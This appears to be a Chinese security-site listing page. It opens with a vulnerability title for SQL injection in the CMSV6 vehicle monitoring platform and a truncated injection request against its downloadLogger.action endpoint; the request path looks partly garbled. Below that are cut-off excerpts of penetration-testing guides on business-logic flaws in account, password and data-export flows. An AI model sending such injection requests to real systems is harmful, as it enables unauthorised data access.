秃兔
通天星 CMSV6 车载定位监控平台 disable SQL注入漏洞
GET /edu security officer/disable;downloadLogger.action?ids=1+AND+%28SELECT+268
【渗透文库】信息删除场景业务逻辑测试
测试描述:通过抓包工具分析信息删除场景的接口内容及工作流程,逐条实施案例验证是否存在业务逻辑漏洞 测试标签:WEB应用安全测试 业务场景:涉及客户信息修改和金融交易删除的业务场景 测试工...
【渗透文库】信息导出/下载场景业务逻辑测试
测试描述:通过抓包工具分析信息导出/下载场景的接口内容及工作流程,逐条实施案例验证是否存在业务逻辑漏洞 测试标签:WEB应用安全测试 业务场景:涉及客户信息修改和金融交易信息导出/下载的...
【渗透文库】信息修改场景业务逻辑测试
测试描述:通过抓包工具分析信息修改场景的接口内容及工作流程,逐条实施案例验证是否存在业务逻辑漏洞 测试标签:WEB应用安全测试 业务场景:涉及客户信息修改和金融交易修改的业务场景 测试工...
【渗透文库】信息查询场景业务逻辑测试
测试描述:通过抓包工具分析信息查询场景的接口内容及工作流程,逐条实施案例验证是否存在业务逻辑漏洞 测试标签:WEB应用安全测试 业务场景:信息查询场景(包括但不限于客户信息查询和金融交...
【渗透文库】密码找回场景业务逻辑测试
测试描述:通过抓包工具分析密码找回场景的接口内容及工作流程,逐条实施案例验证是否存在业务逻辑漏洞。若场景涉及认证要素,则参考对应的认证要素测试方式。 测试标签:WEB应用安全测试 业务...
【渗透文库】密码修改场景业务逻辑测试
测试描述:通过抓包工具分析密码修改场景的接口内容及工作流程,逐条实施案例验证是否存在业务逻辑漏洞。若场景涉及认证要素,则参考对应的认证要素测试方式。 测试标签:WEB应用安全测试 业务...
【渗透文库】账户暂停/恢复场景业务逻辑测试
测试描述:通过抓包工具分析账户暂停/恢复场景的接口内容及工作流程,逐条实施案例验证是否存在业务逻辑漏洞。若场景涉及认证要素,则参考对应的认证要素测试方式。 测试标签:WEB应用安全测试 ...
【渗透文库】账户权限变更场景业务逻辑测试
测试描述:通过抓包工具分析账户权限变更场景的接口内容及工作流程,逐条实施案例验证是否存在业务逻辑漏洞。若场景涉及认证要素,则参考对应的认证要素测试方式。 测试标签:WEB应用安全测试 ...
【渗透文库】注销场景业务逻辑测试
测试描述:通过抓包工具分析注销场景的接口内容及工作流程,逐条实施案例验证是否存在业务逻辑漏洞。若场景涉及认证要素,则参考对应的认证要素测试方式。 测试标签:WEB应用安全测试 业务场景...
